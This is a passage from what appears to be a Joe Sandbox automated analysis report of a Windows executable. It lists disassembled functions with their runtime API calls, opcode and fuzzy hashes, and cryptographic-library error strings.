                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: memmove$ExceptionThrowfree
                • String ID: FilterWithBufferedInput
                • API String ID: 3245812352-4021797063
                • Opcode ID: 45c0a1a949b7a3b5acdf1f267a2abc20fc9ece50c1a8545ba15ca6a3b01845c0
                • Instruction ID: ebeccaa97cee9cc4dc2ec5c4ce5b400404ae62366d6489f0c871ae77c0f1e236
                • Opcode Fuzzy Hash: 45c0a1a949b7a3b5acdf1f267a2abc20fc9ece50c1a8545ba15ca6a3b01845c0
                • Instruction Fuzzy Hash: 9802A972725B8596DB54CF22E6542AD77A0FB48BC0F988036DB6D83B91EF38E065C300
                APIs
                • _CxxThrowException.VCRUNTIME140 ref: 00007FF6F18B216B
                  • Part of subcall function 00007FF6F18AFFD0: memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF6F18B0197
                  • Part of subcall function 00007FF6F18AFFD0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF6F18B0211
                  • Part of subcall function 00007FF6F18AFC00: memmove.VCRUNTIME140 ref: 00007FF6F18AFDB4
                • _CxxThrowException.VCRUNTIME140 ref: 00007FF6F18B2236
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: ExceptionThrowmemmove$_invalid_parameter_noinfo_noreturn
                • String ID: exceeds the maximum of $ is less than the minimum of $: IV length
                • API String ID: 1845102807-1273958906
                • Opcode ID: 3af9b81d17b566c186260205b66e8abf9318f64cf0d017f8cddf76f3fd633423
                • Instruction ID: 0b13293ef3c811244cb4523ad6eed7f5a98fcecbad541e0936ce3a8b64aba9b0
                • Opcode Fuzzy Hash: 3af9b81d17b566c186260205b66e8abf9318f64cf0d017f8cddf76f3fd633423
                • Instruction Fuzzy Hash: 76517F22729A8692EB10AB16D9503EE6361FF99FC0F404036DA6D877E9FF2CD509C740
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: ExceptionThrowfree
                • String ID: byte digest to $ bytes$HashTransformation: can't truncate a
                • API String ID: 2053033275-1139078987
                • Opcode ID: 87c5a9f9edb3221ac16b5caf1f274c246aa6255a798e30822e83d67168a29bf8
                • Instruction ID: d147393e1167187171254841ea60c11d1008144f8c3735c038c78386c569c3fa
                • Opcode Fuzzy Hash: 87c5a9f9edb3221ac16b5caf1f274c246aa6255a798e30822e83d67168a29bf8
                • Instruction Fuzzy Hash: 0831D522729A8255EB10EB12E9503EA6351BF89BD0F444231EE7E87BD6FF3CE5058700
                APIs
                • __std_type_info_compare.VCRUNTIME140(?,?,?,?,?,?,?,?,?,00007FF6F18AF086), ref: 00007FF6F18B9EB5
                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00007FF6F18AF086), ref: 00007FF6F18B9F84
                • _invalid_parameter_noinfo.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00007FF6F18AF086), ref: 00007FF6F18B9F90
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: __std_type_info_compare_errno_invalid_parameter_noinfo
                • String ID:
                • API String ID: 4158822619-0
                • Opcode ID: fb99e7623bcde8bcaad4a989abea06bc1f781d16d413e6109da22a0dd0bcb038
                • Instruction ID: bc18eb22ede3182e5bcd4971a60b5ce2662b97eccd4fccbec75647879a675742
                • Opcode Fuzzy Hash: fb99e7623bcde8bcaad4a989abea06bc1f781d16d413e6109da22a0dd0bcb038
                • Instruction Fuzzy Hash: 76316D62E28B8292EB60CB24E6103B967A1AF457D0F444534EA7D93BD5FF3CE9458740
                APIs
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B3DF0
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B3E2F
                  • Part of subcall function 00007FF6F18AE090: memmove.VCRUNTIME140 ref: 00007FF6F18AE182
                  • Part of subcall function 00007FF6F18AE090: memmove.VCRUNTIME140 ref: 00007FF6F18AE190
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B3E7E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: _invalid_parameter_noinfo_noreturn$memmove
                • String ID: : unexpected channel name "
                • API String ID: 15630516-5263004
                • Opcode ID: 36860424f8d156f3827ed1b36230f4c2af6f07b42707bfaa1ba9219807778592
                • Instruction ID: 048ab09d0ffd93f8463364320fabebd4e1eea424a9a684d8867d25870d322ebd
                • Opcode Fuzzy Hash: 36860424f8d156f3827ed1b36230f4c2af6f07b42707bfaa1ba9219807778592
                • Instruction Fuzzy Hash: 5D616F62F24B858AEB00DB64D6503AC3361EB597D8F405336EA7C52BD9EF78E194C340
                APIs
                  • Part of subcall function 00007FF6F18A1620: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A16D1
                • __std_exception_copy.VCRUNTIME140 ref: 00007FF6F18A268F
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A26D3
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A27BA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
                • String ID: Unknown exception
                • API String ID: 1944019136-410509341
                • Opcode ID: 379b12ae010696974a2783e2f61ba81b06aea7a754c04ac4f4d5bd03ac2e1285
                • Instruction ID: 8a7705dd50d34e0aabe09ad0940e1f29b33a11009393c6a6f0b996ddb331edab
                • Opcode Fuzzy Hash: 379b12ae010696974a2783e2f61ba81b06aea7a754c04ac4f4d5bd03ac2e1285
                • Instruction Fuzzy Hash: C151B822E18B8592EB10DB38E5403A973A1FB99794F505335EABD426E5FF3CD585C700
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: __std_exception_copy_invalid_parameter_noinfo_noreturn
                • String ID: /$: this object doesn't support multiple channels
                • API String ID: 1109970293-537585387
                • Opcode ID: dc36f6becf20736dff3c3847e2f81588e69228c0c20982eb169749a5e6dfb864
                • Instruction ID: 0b3bae4351971fd73c770cd793cdee3c2624f8530afe711c1aa326c74813a8b6
                • Opcode Fuzzy Hash: dc36f6becf20736dff3c3847e2f81588e69228c0c20982eb169749a5e6dfb864
                • Instruction Fuzzy Hash: 15417E72A28B4692DB009F60E5802A97761FB48BD4F505232E6BC837E9FF3CD194C740
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: __current_exception__current_exception_contextterminate
                • String ID: csm
                • API String ID: 2542180945-1018135373
                • Opcode ID: 008f842d458f98e56ad7bd350d53c0ce97974b7d909be2ee8e34882cacc6bd9e
                • Instruction ID: 3e8e969542b01d2674021a95a19660fd330d52d1a49a699544e7ca12a720e4e6
                • Opcode Fuzzy Hash: 008f842d458f98e56ad7bd350d53c0ce97974b7d909be2ee8e34882cacc6bd9e
                • Instruction Fuzzy Hash: 0AF04937515B40CAC3509F25E8801AC3764F78CB88B495231FB6D87795DF38C8909300
                APIs
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A9BD8
                • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A9C53
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A9C5A
                  • Part of subcall function 00007FF6F18CDEB0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF6F18AC6D5), ref: 00007FF6F18CDECA
                • memset.VCRUNTIME140 ref: 00007FF6F18A9C9A
                  • Part of subcall function 00007FF6F18AA4C0: memmove.VCRUNTIME140(?,?,000000F8,00007FF6F18A9CAB), ref: 00007FF6F18AA53A
                  • Part of subcall function 00007FF6F18AA4C0: memmove.VCRUNTIME140 ref: 00007FF6F18AA5E6
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: _invalid_parameter_noinfo_noreturnmemmove$mallocmemsetterminate
                • String ID:
                • API String ID: 2098859242-0
                • Opcode ID: f2e50d5dfdcb3d44de8dd0ec76937119887d14485c865269fc8813566bc76e0e
                • Instruction ID: 419e51c49ea5b77b5b8b38c0cf949e03f6aec663cef9ba19ae22208f05be6ad2
                • Opcode Fuzzy Hash: f2e50d5dfdcb3d44de8dd0ec76937119887d14485c865269fc8813566bc76e0e
                • Instruction Fuzzy Hash: FB516D32B29A8592EF54DB65D29027863A1FB44FD4F548135DA7E87BC8EF3CD4918340
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: memmove$ExceptionThrow
                • String ID: RoundUpToMultipleOf: integer overflow
                • API String ID: 1747913114-1120416164
                • Opcode ID: bd3d2d3530773a31bcc3216a8ad391adf97e0b3264c7dac57fc02f0177ca89c1
                • Instruction ID: 3ade325436199f2544cc817c1e5612c1c9c361477d0212921454c0b02e92821c
                • Opcode Fuzzy Hash: bd3d2d3530773a31bcc3216a8ad391adf97e0b3264c7dac57fc02f0177ca89c1
                • Instruction Fuzzy Hash: 5B41D462B25A9586DF50DF2ADA443A8A362BF48FD4F488535DE2D83B94EF3CD4068300
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7a338fdee72b02de291d65cd623cc7503b090a0e9557c46dc24a81594b608005
                • Instruction ID: 5a23c6384d019d1736ec40365e57f41a095779dffa6d6590da6db2f0977ad3b9
                • Opcode Fuzzy Hash: 7a338fdee72b02de291d65cd623cc7503b090a0e9557c46dc24a81594b608005
                • Instruction Fuzzy Hash: 2F514E36A18B8196DB508F29E56036D77A1FB84BE4F544236DAADC37E8EF39C448C710
                APIs
                • memmove.VCRUNTIME140(00000000,?,?,00000000,00007FF6F18A210E), ref: 00007FF6F18ABA6F
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,00000000,00007FF6F18A210E), ref: 00007FF6F18ABAB2
                • memmove.VCRUNTIME140(00000000,?,?,00000000,00007FF6F18A210E), ref: 00007FF6F18ABABC
                • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6F18ABAF7
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                • String ID:
                • API String ID: 2016347663-0
                • Opcode ID: 96c16ea9bc4cb23ce195f8ad72f289fc9578f9d5a05f835367fa65bb0031a4b3
                • Instruction ID: 2bc498c9d793bf330269ece0ec79908b34222024aba6647657f0e6ca3ba72aa0
                • Opcode Fuzzy Hash: 96c16ea9bc4cb23ce195f8ad72f289fc9578f9d5a05f835367fa65bb0031a4b3
                • Instruction Fuzzy Hash: 6B41EF22B29B8192EB109B16A65416D6362EB04BE0F544735DE7D87BD5EF7CF0918304
                APIs
                • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,00007FF6F18A2165), ref: 00007FF6F18ABF0C
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,00007FF6F18A2165), ref: 00007FF6F18ABF40
                • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,00007FF6F18A2165), ref: 00007FF6F18ABF4A
                • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6F18ABF73
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                • String ID:
                • API String ID: 2016347663-0
                • Opcode ID: 1eba7b7a7f2da7253baf1b2edd2396aeb8a50825c709a64e048d660277330e4a
                • Instruction ID: e4c51615c10b9e845c076d12e0a092b99c5d674226d9dfdfcf1a1ebc9ca9c832
                • Opcode Fuzzy Hash: 1eba7b7a7f2da7253baf1b2edd2396aeb8a50825c709a64e048d660277330e4a
                • Instruction Fuzzy Hash: F131E661B29746A6EF209B15D6003A8A356EB04BE4F580631DF7D8BBD5FF3CE0918344
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: ExceptionThrow
                • String ID: byte digest to $ bytes$HashTransformation: can't truncate a
                • API String ID: 432778473-1139078987
                • Opcode ID: bd2fc6a02f98805dc94eb4e00909ca8d2d06099a6d0f02b07f4a6c37d24295a9
                • Instruction ID: 5cebd333aff4e7c0c5a117df150e5dc35365d471c94ab96a273a2527241b54c7
                • Opcode Fuzzy Hash: bd2fc6a02f98805dc94eb4e00909ca8d2d06099a6d0f02b07f4a6c37d24295a9
                • Instruction Fuzzy Hash: 4C31C062729A8291EB60DB65E5603EEA361FF88BC0F444036CA6D877DAFF2CD544C740
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: ExceptionThrow
                • String ID: FilterWithBufferedInput: invalid buffer size$PutMessage$TruncatedDigestSize
                • API String ID: 432778473-3547780871
                • Opcode ID: 61f67bdecee4b6e32166a2bfe443cb96dd27ad04e014f9eac68d9225877d04c9
                • Instruction ID: 8e4c5019260da1aace1eade572bd209bbb42a2ce5bf69ab20be96ef33a79b367
                • Opcode Fuzzy Hash: 61f67bdecee4b6e32166a2bfe443cb96dd27ad04e014f9eac68d9225877d04c9
                • Instruction Fuzzy Hash: AF31BF32628B8692DB10CB55E6506E97360FB84BA4F441232EBBD87BE5EF3CD459C700
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                • String ID:
                • API String ID: 2075926362-0
                • Opcode ID: a1a76f46bff213676c10719a4f32bbe5b6413d7611d36d59d55c4fc261e8dd5e
                • Instruction ID: a1d092e5954ba692f12d34e9ea2ecb1540686d603ad88a736d91746e5d9f0f91
                • Opcode Fuzzy Hash: a1a76f46bff213676c10719a4f32bbe5b6413d7611d36d59d55c4fc261e8dd5e
                • Instruction Fuzzy Hash: 2431D532B15B45A1EF259B52E6403A96291AB48BE4F544731DF7D877D1FF3CE0918340
                APIs
                • memmove.VCRUNTIME140(?,?,?,?,00007FF6F18AA27E,?,?,00000002,00007FF6F18B2E91), ref: 00007FF6F18ABFB8
                • memmove.VCRUNTIME140(?,?,?,?,00007FF6F18AA27E,?,?,00000002,00007FF6F18B2E91), ref: 00007FF6F18AC058
                • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6F18AC076
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
